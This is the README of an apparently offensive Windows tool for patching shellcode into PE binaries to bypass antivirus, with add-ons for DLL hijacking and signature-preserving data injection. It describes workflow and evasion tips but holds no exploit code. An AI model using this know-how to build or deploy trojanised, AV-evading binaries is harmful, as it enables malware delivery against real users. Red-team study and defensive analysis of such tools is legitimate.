A tool for automatic patch shellcode into binary file to bypass AV.
一个自动patch shellcode到二进制文件的工具
- Two Fuzz Modes
- Auto Analysis: CFG + Call Chain + Symbolic Execution verification
- Fuzz All: Test all large functions directly
- Smart Function Filtering - Filter by call depth, function size, and symbolic execution reachability
- Symbolic Execution Verification - Verify functions are actually reachable from entry point
- Digital Signature Removal - Remove PE signature with auto backup
- Modern Dark Theme UI - Multiple theme options with ttkbootstrap
- Multi-language Support - Chinese/English interface
- Cache System - Speed up repeated analysis
ZeroEye is an automated DLL hijacking scanner that supports native PE, .NET programs, and kernel drivers.
Features:
- Native PE Scan: Scan import table, auto-copy non-system DLLs, generate proxy DLL templates
- .NET Scan: Detect Config hijack/P/Invoke/Assembly side-loading vectors
- Kernel Driver Scan: Scan IOCTL + dangerous APIs (skip MS signed drivers)
- C++ Class Rebuild: Rebuild C++ class from MSVC decorated names, generate 3 proxy templates
Usage: Click ZeroEye button in the main window to open the tool.
SigFlip is a signature manipulation tool using certificate table padding technique.
Features:
- Bit Flip: Add random padding to change PE hash without breaking signature
- Inject: Embed custom data into certificate area with
BinarySpymagic tag - Extract: Extract embedded data from modified PE files
Usage: Click SigFlip button in the main window to open the tool.
pip install pefile angr psutil ttkbootstrap- Select target PE file
- Select patch source (or use built-in test patch)
- Choose Fuzz mode:
- Auto Analysis: Recommended for most cases
- Fuzz All: Brute force all large functions
- Configure parameters:
- Test Delay: Time to wait for process spawn
- Monitor Process: Process name to detect (e.g.,
calc.exe) - Max Call Depth: Filter functions by call depth
- Min Function Size: Minimum function size to test
- Symbolic Execution Steps: Only when symbolic execution is enabled
- Click Start Fuzz
| Feature | Auto Analysis | Fuzz All |
|---|---|---|
| CFG Analysis | Full | Basic |
| Call Chain Tracking | Yes | No |
| Symbolic Execution | Optional | No |
| Call Depth Filter | Yes | No |
| Function Size Filter | Yes | Yes |
| Speed | Slower | Faster |
| Parameter | Description |
|---|---|
| Test Delay | Seconds to wait before checking if target process spawned |
| Monitor Process | Process name(s) to monitor, comma separated (e.g.,calc.exe,CalculatorApp.exe) |
| Max Call Depth | Only test functions within this depth from entry point |
| Min Function Size | Only test functions larger than this size |
| Sym Exec Steps | Maximum steps for symbolic execution verification |
Available dark themes:
cyborg- Dark gray/cyan (default)darkly- Dark blue/whitevapor- Dark purple/pinksuperhero- Dark gray/orangepulse- Dark gray/blue
- Use larger PE files as targets
- Prefer PE files with GUI subsystem (no console window)
- Keep shellcode small for better results
- For custom shellcode, use CppDevShellcode
Entry Point → CRT → Main → Target Functions
↓
CFG Analysis
↓
Call Chain Tracking
↓
Symbolic Execution (optional)
↓
Fuzz Testing
↓
Success Detection
This project is for educational and authorized security testing purposes only. Users are responsible for ensuring compliance with applicable laws and regulations. The author assumes no liability for any misuse or damage caused by this tool.